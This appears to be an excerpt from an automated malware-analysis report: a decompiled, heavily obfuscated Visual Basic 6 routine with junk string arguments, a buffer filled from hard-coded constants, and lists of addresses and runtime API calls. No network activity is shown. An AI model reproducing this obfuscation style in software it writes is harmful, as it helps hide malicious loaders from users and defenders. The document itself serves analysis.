				_v280 = 8;
				L0040184C();
				_push( &_v184);
				_push( &_v200);
				L00401852();
				_push( &_v200);
				_t658 =  &_v144;
				_push(_t658);
				L00401858();
				_push(_t658);
				L0040185E();
				_v208 = _t658;
				_v216 = 8;
				_t659 =  &_v216;
				_push(_t659);
				L00401864();
				asm("sbb eax, eax");
				_v380 =  ~( ~_t659 + 1);
				_t932 =  &_v144;
				L00401846();
				_push( &_v216);
				_push( &_v200);
				_push( &_v184);
				_push(3);
				L00401840();
				_t1069 = _t1068 + 0x10;
				if(_v380 != 0) {
					_push(L"7:7:7");
					__eax =  &_v184;
					_push( &_v184); // executed
					L0040182E(); // executed
					__eax =  &_v184;
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
					_v272 = L"Readjust";
					_v280 = 8;
					L0040184C();
					__eax =  &_v184;
					_push( &_v184);
					__eax =  &_v200;
					_push( &_v200);
					L0040181C();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v144;
					L00401858();
					_push(L"CANNIBALEAN");
					_push(L"Bursati");
					_push(L"multivalent"); // executed
					L00401822(); // executed
					L00401846();
					__eax =  &_v200;
					_push( &_v200);
					__eax =  &_v184;
					_push( &_v184);
					_push(2);
					L00401840();
					__esp = __esp + 0xc;
				}
				_push( &_v184);
				L0040180A();
				_push( &_v184);
				_t1082 =  *0x401258;
				_push(_t932);
				_push(_t932);
				_v92 = _t1082;
				_push(0x4024fc);
				_push( &_v200);
				L00401810();
				_v272 = 0xfffffff9;
				_v280 = 0x8002;
				_push( &_v200);
				_t671 =  &_v280;
				_push(_t671);
				L00401816();
				_v380 = _t671;
				_push( &_v200);
				_push( &_v184);
				_push(2);
				L00401840();
				_t1070 = _t1069 + 0xc;
				if(_v380 != 0) {
					_v176 = 1;
					_v184 = 2;
					_push(0);
					_push( &_v184);
					L00401804();
					L0040183A();
					L00401828();
					_push( &_v184);
					L004017FE();
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
				}
				_v272 = L"replicr";
				_v280 = 8;
				L0040184C();
				_t675 =  &_v184;
				_push(_t675);
				L004017F8();
				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
				L00401828();
				_t676 = _v380;
				if(_t676 != 0) {
					 *_v64 = 0x579;
					 *((short*)(_v64 + 2)) = 0x23c6;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t882 =  &_v184;
					_push(_t882);
					L004017F2();
					_t989 = 2;
					 *((short*)(_v64 + (_t989 << 1))) = _t882;
					L00401828();
					_t883 = 2;
					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
					_t885 = 2;
					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
					_t887 = 2;
					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
					_t889 = 2;
					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
					_v272 = 0x402518;
					_v280 = 8;
					L0040184C();
					_t891 =  &_v184;
					_push(_t891);
					_push(0x10);
					L004017DA();
					L0040183A();
					_push(_t891);
					L004017E0();
					_v192 = _t891;
					_v200 = 3;
					_t892 =  &_v200;
					_push(_t892);
					L004017E6();
					L0040183A();
					_push(_t892);
					L004017EC();
					_t999 = 2;
					 *((short*)(_v64 + _t999 * 7)) = _t892;
					_push( &_v148);
					_push( &_v144);
					_push(2);
					L004017D4();
					_push( &_v200);
					_push( &_v184);
					_push(2);
					L00401840();
					_t1070 = _t1070 + 0x18;
					_t897 = 2;
					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
					_t899 = 2;
					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
					_t901 = 2;
					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t903 =  &_v184;
					_push(_t903);
					L004017F2();
					_t1004 = 2;
					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
					L00401828();
					_t904 = 2;
					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
					_t906 = 2;
					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
					_t908 = 2;
					_t909 = _t908 * 0xe;
					 *((short*)(_v64 + _t909)) = 0x34bb;
					_push(L"OFFENTLIGHEDSSFRE");
					L004017EC();
					_t1010 = 2;
					 *(_v64 + _t1010 * 0xf) = _t909;
					_t910 = 2;
					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
					_t912 = 2;
					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
					_t914 = 2;
					_t915 = _t914 * 0x12;
					 *((short*)(_v64 + _t915)) = 0x6a6e;
					_push(L"Dagvagten");
					L004017EC();
					_t1015 = 2;
					 *(_v64 + _t1015 * 0x13) = _t915;
					if( *0x4233c0 != 0) {
						_v436 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v436 = 0x4233c0;
					}
					_v380 =  *_v436;
					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
					asm("fclex");
					_v384 = _t921;
					if(_v384 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v380);
						_push(_v384);
						L004017C8();
						_v440 = _t921;
					}
					_v388 = _v168;
					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
					asm("fclex");
					_v392 = _t926;
					if(_v392 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40258c);
						_push(_v388);
						_push(_v392);
						L004017C8();
						_v444 = _t926;
					}
					_t676 = _v332;
					_v104 = _t676;
					L004017C2();
				}
				L004017BC();
				L0040183A();
				L004017BC();
				L0040183A();
				_v404 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
				L004017D4();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t685 =  &_v184;
				L004017F2();
				_v344 = _t685;
				_v336 = 0x6988;
				L004017B6();
				_v348 = 0x10e914;
				_v332 = _v344;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
				_t695 = _v340;
				_v52 = _t695;
				L00401846();
				L00401828();
				_v348 = 0x40f600;
				L004017B0();
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
				L00401846();
				L004017B6();
				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
				_v380 = _t704;
				if(_v380 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v448 = _t704;
				}
				_v408 = _v148;
				_v148 = _v148 & 0x00000000;
				L0040183A();
				L00401846();
				L004017AA();
				_v368 = _t1082;
				_v176 = _v368;
				_v184 = 4;
				_push( &_v200);
				_t707 =  &_v184;
				_push(_t707);
				L004017A4();
				_v380 = _t707;
				if(_v380 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v452 = _t707;
				}
				L00401792();
				_t708 =  &_v168;
				L00401798();
				_v384 = _t708;
				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
				asm("fclex");
				_v388 = _t712;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40264c);
					_push(_v384);
					_push(_v388);
					L004017C8();
					_v456 = _t712;
				}
				_v364 = 0xed488;
				_v360 = 0x711cb2;
				_t713 =  &_v200;
				L0040178C();
				_v356 = _t713;
				_v352 = 0x23dec;
				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
				_v392 = _t720;
				if(_v392 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402320);
					_push(_a4);
					_push(_v392);
					L004017C8();
					_v460 = _t720;
				}
				L004017C2();
				_t722 =  &_v184;
				L00401840();
				L00401786();
				L0040183A();
				L004017EC();
				_v340 = _t722;
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t723 =  &_v184;
				L004017F2();
				_v344 = _t723;
				L00401780();
				_v348 = _t723;
				_v336 = _v344;
				_v332 = _v340;
				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
				_v380 = _t731;
				if(_v380 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v464 = _t731;
				}
				L00401846();
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t732 =  &_v184;
				L004017F2();
				_v336 = _t732;
				_v332 = _v336;
				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
				_v380 = _t737;
				if(_v380 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v468 = _t737;
				}
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t738 =  &_v184;
				_push(_t738);
				L004017F2();
				_v336 = _t738;
				_v192 =  *0x40124c;
				_v200 = 4;
				_push(0);
				_push( &_v200);
				_push( &_v216);
				L0040177A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t741 =  &_v232;
				_push(_t741);
				L004017F2();
				_v340 = _t741;
				_t1086 =  *0x401248;
				_v240 = _t1086;
				_v248 = 4;
				_push( &_v264);
				_t743 =  &_v248;
				_push(_t743);
				L004017A4();
				_v380 = _t743;
				if(_v380 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v472 = _t743;
				}
				_v332 = _v340;
				_v352 = 0x1eaaee;
				_t745 =  &_v216;
				L0040178C();
				_v348 = _t745;
				_t747 =  &_v264;
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
				_v136 = _v356;
				L00401840();
				L00401774();
				_v376 = _t1086;
				L0040185E();
				L0040183A();
				_t761 = _v156;
				_v412 = _t761;
				_v156 = _v156 & 0x00000000;
				L0040176E();
				_v348 = _t761;
				L004017B6();
				_t762 =  &_v152;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
				_v416 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				_t771 =  &_v144;
				L004017D4();
				L004017EC();
				_v336 = _t771;
				_v176 = 0x1ca534;
				_v184 = 3;
				_t772 =  &_v184;
				L004017E6();
				L0040183A();
				L00401768();
				_v352 = _t772;
				_v332 = _v336;
				_v348 = 0x761fa7;
				_t776 =  &_v332;
				L00401762();
				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
				_v380 = _t780;
				if(_v380 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v476 = _t780;
				}
				L00401846();
				L00401828();
				L004017EC();
				_v340 = _t780;
				_v332 = 0x640;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
				_v132 = _v336;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
				_v84 = _v332;
				_v336 = 0x393d;
				_v332 = 0x67ff;
				L004017B6();
				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
				_v380 = _t797;
				if(_v380 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v480 = _t797;
				}
				L00401846();
				_v352 = 0x419a61;
				_v348 = 0x5ea767;
				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
				_v380 = _t802;
				if(_v380 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v484 = _t802;
				}
				_v272 = 0x402840;
				_v280 = 8;
				L0040184C();
				L0040175C();
				L00401834();
				L0040183A();
				L004017B6();
				_v336 = 0x54f7;
				_v332 = 0x147e;
				_t808 =  &_v144;
				L00401762();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
				_v44 = _v348;
				L004017D4();
				L00401840();
				_v176 = 0xfffffff6;
				_v184 = 2;
				_t819 =  &_v184;
				L00401804();
				L0040183A();
				L00401762();
				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
				_v380 = _t822;
				if(_v380 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v488 = _t822;
				}
				L00401846();
				L00401828();
				L004017E0();
				_v348 = _t822;
				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
				_v380 = _t827;
				if(_v380 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x718);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v492 = _t827;
				}
				_v100 = _v352;
				L00401756();
				L0040183A();
				L00401750();
				L0040183A();
				_v420 = _v164;
				_v164 = _v164 & 0x00000000;
				L0040183A();
				_v424 = _v160;
				_v160 = _v160 & 0x00000000;
				L004017B6();
				_t832 =  &_v152;
				L0040183A();
				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
				_v380 = _t836;
				if(_v380 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x71c);
					_push(0x402320);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v496 = _t836;
				}
				_v428 = _v156;
				_v156 = _v156 & 0x00000000;
				L0040183A();
				_push( &_v164);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_t842 =  &_v144;
				_push(_t842);
				_push(5);
				L004017D4();
				asm("fabs");
				_v176 =  *0x401238;
				asm("fnstsw ax");
				if((_t842 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v184 = 5;
				_push( &_v200);
				_t845 =  &_v184;
				_push(_t845);
				L004017A4();
				_v380 = _t845;
				if(_v380 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v500 = _t845;
				}
				L0040182E();
				_t848 =  &_v144;
				L00401858();
				L004017BC();
				L0040183A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t849 =  &_v232;
				L004017F2();
				_v340 = _t849;
				_v332 = _v340;
				_v432 = _v152;
				_v152 = _v152 & 0x00000000;
				_t853 =  &_v332;
				L0040183A();
				_t854 =  &_v200;
				L0040178C();
				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
				_v384 = _t857;
				if(_v384 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x720);
					_push(0x402320);
					_push(_a4);
					_push(_v384);
					L004017C8();
					_v504 = _t857;
				}
				_v92 = _v336;
				L004017D4();
				_t865 =  &_v184;
				L00401840();
				L004017EC();
				_v336 = _t865;
				L004017EC();
				_v340 = _t865;
				L004017B6();
				_v332 = 0x2885;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x402948, 0x402900, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
				L00401846();
				E00421867();
				_v272 = 2;
				_v280 = 2;
				L0040174A();
				_v272 = 0x806d7e;
				_v280 = 3;
				L0040174A();
				_t874 =  &_v184;
				L00401744();
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
				_v8 = 0;
				asm("wait");
				_push(0x41de68);
				L00401828();
				L00401846();
				_v348 =  &_v76;
				_t879 =  &_v348;
				_push(_t879);
				_push(0);
				L0040173E();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t879;
			}

0x0041c7d7
0x0041c7e6
0x0041c7f2
0x0041c7fa
0x0041c7fd
0x0041c80a
0x0041c813
0x0041c81e
0x0041c821
0x0041c823
0x0041c82b
0x0041c82c
0x0041c831
0x0041c83b
0x0041c851
0x0041c85c
0x0041c863
0x0041c864
0x0041c86f
0x0041c870
0x0041c876
0x0041c877
0x0041c87c
0x0041c87d
0x0041c882
0x0041c888
0x0041c892
0x0041c898
0x0041c899
0x0041c8a1
0x0041c8a6
0x0041c8ad
0x0041c8b3
0x0041c8be
0x0041c8c5
0x0041c8cc
0x0041c8cd
0x0041c8cf
0x0041c8d4
0x0041c8e0
0x0041c8e6
0x0041c8eb
0x0041c8f1
0x0041c8f2
0x0041c8f7
0x0041c8fd
0x0041c8fe
0x0041c908
0x0041c913
0x0041c918
0x0041c922
0x0041c938
0x0041c93d
0x0041c943
0x0041c944
0x0041c94a
0x0041c94b
0x0041c950
0x0041c956
0x0041c957
0x0041c95e
0x0041c964
0x0041c969
0x0041c96e
0x0041c973
0x0041c97e
0x0041c983
0x0041c989
0x0041c98a
0x0041c990
0x0041c991
0x0041c993
0x0041c998
0x0041c998
0x0041c9a1
0x0041c9a2
0x0041c9ad
0x0041c9ae
0x0041c9b4
0x0041c9b5
0x0041c9b6
0x0041c9b9
0x0041c9c4
0x0041c9c5
0x0041c9ca
0x0041c9d4
0x0041c9e4
0x0041c9e5
0x0041c9eb
0x0041c9ec
0x0041c9f1
0x0041c9fe
0x0041ca05
0x0041ca06
0x0041ca08
0x0041ca0d
0x0041ca19
0x0041ca1b
0x0041ca25
0x0041ca2f
0x0041ca37
0x0041ca38
0x0041ca42
0x0041ca4d
0x0041ca58
0x0041ca59
0x0041ca64
0x0041ca65
0x0041ca6f
0x0041ca7a
0x0041ca7a
0x0041ca7f
0x0041ca89
0x0041ca9f
0x0041caa4
0x0041caaa
0x0041caab
0x0041cabb
0x0041cac8
0x0041cacd
0x0041cad6
0x0041cadf
0x0041cae7
0x0041caed
0x0041caf7
0x0041cb01
0x0041cb07
0x0041cb08
0x0041cb0f
0x0041cb15
0x0041cb1f
0x0041cb26
0x0041cb2d
0x0041cb35
0x0041cb3c
0x0041cb44
0x0041cb4b
0x0041cb53
0x0041cb5a
0x0041cb60
0x0041cb6a
0x0041cb80
0x0041cb85
0x0041cb8b
0x0041cb8c
0x0041cb8e
0x0041cb9b
0x0041cba0
0x0041cba1
0x0041cba6
0x0041cbac
0x0041cbb6
0x0041cbbc
0x0041cbbd
0x0041cbca
0x0041cbcf
0x0041cbd0
0x0041cbd7
0x0041cbde
0x0041cbe8
0x0041cbef
0x0041cbf0
0x0041cbf2
0x0041cc00
0x0041cc07
0x0041cc08
0x0041cc0a
0x0041cc0f
0x0041cc14
0x0041cc1b
0x0041cc23
0x0041cc2a
0x0041cc32
0x0041cc39
0x0041cc3f
0x0041cc49
0x0041cc53
0x0041cc59
0x0041cc5a
0x0041cc61
0x0041cc68
0x0041cc72
0x0041cc79
0x0041cc80
0x0041cc88
0x0041cc8f
0x0041cc97
0x0041cc98
0x0041cc9e
0x0041cca4
0x0041cca9
0x0041ccb0
0x0041ccb7
0x0041ccbd
0x0041ccc4
0x0041cccc
0x0041ccd3
0x0041ccdb
0x0041ccdc
0x0041cce2
0x0041cce8
0x0041cced
0x0041ccf4
0x0041ccfb
0x0041cd06
0x0041cd23
0x0041cd08
0x0041cd08
0x0041cd0d
0x0041cd12
0x0041cd17
0x0041cd17
0x0041cd35
0x0041cd50
0x0041cd53
0x0041cd55
0x0041cd62
0x0041cd84
0x0041cd64
0x0041cd64
0x0041cd66
0x0041cd6b
0x0041cd71
0x0041cd77
0x0041cd7c
0x0041cd7c
0x0041cd91
0x0041cdac
0x0041cdaf
0x0041cdb1
0x0041cdbe
0x0041cde0
0x0041cdc0
0x0041cdc0
0x0041cdc2
0x0041cdc7
0x0041cdcd
0x0041cdd3
0x0041cdd8
0x0041cdd8
0x0041cde7
0x0041cdee
0x0041cdf8
0x0041cdf8
0x0041ce02
0x0041ce0f
0x0041ce15
0x0041ce22
0x0041ce2d
0x0041ce33
0x0041ce46
0x0041ce69
0x0041ce86
0x0041ce8e
0x0041ce98
0x0041cea2
0x0041cea9
0x0041ceae
0x0041ceb5
0x0041cec9
0x0041cece
0x0041cedf
0x0041cf16
0x0041cf1c
0x0041cf23
0x0041cf2d
0x0041cf38
0x0041cf3d
0x0041cf4c
0x0041cf59
0x0041cf6e
0x0041cf7a
0x0041cf8a
0x0041cfaa
0x0041cfb0
0x0041cfbd
0x0041cfdf
0x0041cfbf
0x0041cfbf
0x0041cfc4
0x0041cfc9
0x0041cfcc
0x0041cfd2
0x0041cfd7
0x0041cfd7
0x0041cfec
0x0041cff2
0x0041d002
0x0041d00d
0x0041d012
0x0041d017
0x0041d023
0x0041d029
0x0041d039
0x0041d03a
0x0041d040
0x0041d041
0x0041d046
0x0041d053
0x0041d068
0x0041d055
0x0041d055
0x0041d05b
0x0041d060
0x0041d060
0x0041d06f
0x0041d075
0x0041d07c
0x0041d081
0x0041d09c
0x0041d09f
0x0041d0a1
0x0041d0ae
0x0041d0d0
0x0041d0b0
0x0041d0b0
0x0041d0b2
0x0041d0b7
0x0041d0bd
0x0041d0c3
0x0041d0c8
0x0041d0c8
0x0041d0d7
0x0041d0e1
0x0041d0eb
0x0041d0f2
0x0041d0f7
0x0041d0fd
0x0041d136
0x0041d13c
0x0041d149
0x0041d16b
0x0041d14b
0x0041d14b
0x0041d150
0x0041d155
0x0041d158
0x0041d15e
0x0041d163
0x0041d163
0x0041d178
0x0041d184
0x0041d18d
0x0041d19a
0x0041d1a7
0x0041d1ad
0x0041d1b2
0x0041d1b9
0x0041d1c3
0x0041d1cd
0x0041d1d4
0x0041d1d9
0x0041d1e6
0x0041d1eb
0x0041d1f8
0x0041d206
0x0041d234
0x0041d23a
0x0041d247
0x0041d269
0x0041d249
0x0041d249
0x0041d24e
0x0041d253
0x0041d256
0x0041d25c
0x0041d261
0x0041d261
0x0041d276
0x0041d281
0x0041d286
0x0041d290
0x0041d29a
0x0041d2a1
0x0041d2a6
0x0041d2b4
0x0041d2cf
0x0041d2d5
0x0041d2e2
0x0041d304
0x0041d2e4
0x0041d2e4
0x0041d2e9
0x0041d2ee
0x0041d2f1
0x0041d2f7
0x0041d2fc
0x0041d2fc
0x0041d311
0x0041d316
0x0041d320
0x0041d32a
0x0041d330
0x0041d331
0x0041d336
0x0041d343
0x0041d349
0x0041d353
0x0041d35b
0x0041d362
0x0041d363
0x0041d368
0x0041d372
0x0041d37c
0x0041d382
0x0041d383
0x0041d388
0x0041d38f
0x0041d395
0x0041d39b
0x0041d3ab
0x0041d3ac
0x0041d3b2
0x0041d3b3
0x0041d3b8
0x0041d3c5
0x0041d3da
0x0041d3c7
0x0041d3c7
0x0041d3cd
0x0041d3d2
0x0041d3d2
0x0041d3e8
0x0041d3ef
0x0041d3f9
0x0041d400
0x0041d405
0x0041d412
0x0041d419
0x0041d44c
0x0041d458
0x0041d48a
0x0041d497
0x0041d49c
0x0041d4a7
0x0041d4b4
0x0041d4b9
0x0041d4bf
0x0041d4c5
0x0041d4d2
0x0041d4d7
0x0041d4e8
0x0041d4ed
0x0041d505
0x0041d521
0x0041d52d
0x0041d533
0x0041d546
0x0041d559
0x0041d562
0x0041d56f
0x0041d574
0x0041d57b
0x0041d585
0x0041d58f
0x0041d596
0x0041d5a3
0x0041d5ae
0x0041d5b3
0x0041d5c0
0x0041d5c7
0x0041d5df
0x0041d5eb
0x0041d600
0x0041d606
0x0041d613
0x0041d635
0x0041d615
0x0041d615
0x0041d61a
0x0041d61f
0x0041d622
0x0041d628
0x0041d62d
0x0041d62d
0x0041d642
0x0041d64d
0x0041d657
0x0041d65c
0x0041d663
0x0041d688
0x0041d695
0x0041d6a8
0x0041d6b5
0x0041d6b9
0x0041d6c2
0x0041d6d6
0x0041d70c
0x0041d712
0x0041d71f
0x0041d741
0x0041d721
0x0041d721
0x0041d726
0x0041d72b
0x0041d72e
0x0041d734
0x0041d739
0x0041d739
0x0041d74e
0x0041d753
0x0041d75d
0x0041d787
0x0041d78d
0x0041d79a
0x0041d7bc
0x0041d79c
0x0041d79c
0x0041d7a1
0x0041d7a6
0x0041d7a9
0x0041d7af
0x0041d7b4
0x0041d7b4
0x0041d7c3
0x0041d7cd
0x0041d7e3
0x0041d7f8
0x0041d804
0x0041d811
0x0041d821
0x0041d826
0x0041d82f
0x0041d84b
0x0041d857
0x0041d878
0x0041d884
0x0041d897
0x0041d8af
0x0041d8b7
0x0041d8c1
0x0041d8cd
0x0041d8d4
0x0041d8e1
0x0041d8e7
0x0041d8fa
0x0041d900
0x0041d90d
0x0041d92f
0x0041d90f
0x0041d90f
0x0041d914
0x0041d919
0x0041d91c
0x0041d922
0x0041d927
0x0041d927
0x0041d93c
0x0041d947
0x0041d951
0x0041d956
0x0041d97c
0x0041d982
0x0041d98f
0x0041d9b1
0x0041d991
0x0041d991
0x0041d996
0x0041d99b
0x0041d99e
0x0041d9a4
0x0041d9a9
0x0041d9a9
0x0041d9be
0x0041d9c3
0x0041d9d0
0x0041d9dc
0x0041d9e9
0x0041d9f4
0x0041d9fa
0x0041da0d
0x0041da18
0x0041da1e
0x0041da30
0x0041da4b
0x0041da5e
0x0041da73
0x0041da79
0x0041da86
0x0041daa8
0x0041da88
0x0041da88
0x0041da8d
0x0041da92
0x0041da95
0x0041da9b
0x0041daa0
0x0041daa0
0x0041dab5
0x0041dabb
0x0041dacb
0x0041dad6
0x0041dadd
0x0041dae4
0x0041daeb
0x0041daec
0x0041daf2
0x0041daf3
0x0041daf5
0x0041db03
0x0041db05
0x0041db0b
0x0041db0f
0x0040154c
0x0040154c
0x0041db15
0x0041db25
0x0041db26
0x0041db2c
0x0041db2d
0x0041db32
0x0041db3f
0x0041db54
0x0041db41
0x0041db41
0x0041db47
0x0041db4c
0x0041db4c
0x0041db67
0x0041db73
0x0041db7a
0x0041db80
0x0041db8d
0x0041db92
0x0041db9c
0x0041dba6
0x0041dbad
0x0041dbb2
0x0041dbc0
0x0041dbcd
0x0041dbd3
0x0041dbe6
0x0041dbf9
0x0041dbff
0x0041dc06
0x0041dc14
0x0041dc1a
0x0041dc27
0x0041dc49
0x0041dc29
0x0041dc29
0x0041dc2e
0x0041dc33
0x0041dc36
0x0041dc3c
0x0041dc41
0x0041dc41
0x0041dc57
0x0041dc72
0x0041dc8f
0x0041dc98
0x0041dca5
0x0041dcaa
0x0041dcb6
0x0041dcbb
0x0041dccd
0x0041dcd2
0x0041dd07
0x0041dd13
0x0041dd18
0x0041dd1d
0x0041dd27
0x0041dd3a
0x0041dd3f
0x0041dd49
0x0041dd5c
0x0041dd69
0x0041dd70
0x0041dd76
0x0041dd84
0x0041dd8a
0x0041dd91
0x0041dd92
0x0041de10
0x0041de18
0x0041de20
0x0041de26
0x0041de2c
0x0041de2d
0x0041de2f
0x0041de37
0x0041de3f
0x0041de47
0x0041de4f
0x0041de57
0x0041de62
0x0041de67

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C7F2
__vbaAryConstruct2.MSVBVM60(?,004029AC,00000002,?,?,?,?,00401546), ref: 0041C82C
__vbaVarDup.MSVBVM60 ref: 0041C851
#522.MSVBVM60(?,?), ref: 0041C864
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C877
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C87D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C899
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C8B3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C8CF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C8F2
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C8FE
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C908
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C913
__vbaVarDup.MSVBVM60 ref: 0041C938
#524.MSVBVM60(?,?), ref: 0041C94B
